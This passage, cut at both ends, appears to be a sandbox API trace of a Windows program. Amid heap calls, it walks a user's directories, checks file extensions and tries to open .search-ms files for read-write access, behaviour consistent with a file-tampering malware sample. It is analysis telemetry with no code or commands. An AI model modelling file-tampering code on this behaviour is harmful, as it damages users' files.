(HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.336] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0195.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.336] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.336] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.337] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.337] PathFindFileNameW (pszPath="") returned="" [0195.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.337] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.337] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.337] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0195.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.338] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini") returned=".ini" [0195.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.338] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0195.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.339] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms") returned=".search-ms" [0195.339] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.341] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0195.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.341] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0195.342] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.342] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0195.342] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.343] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.343] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.360] RtlAllocateHeap 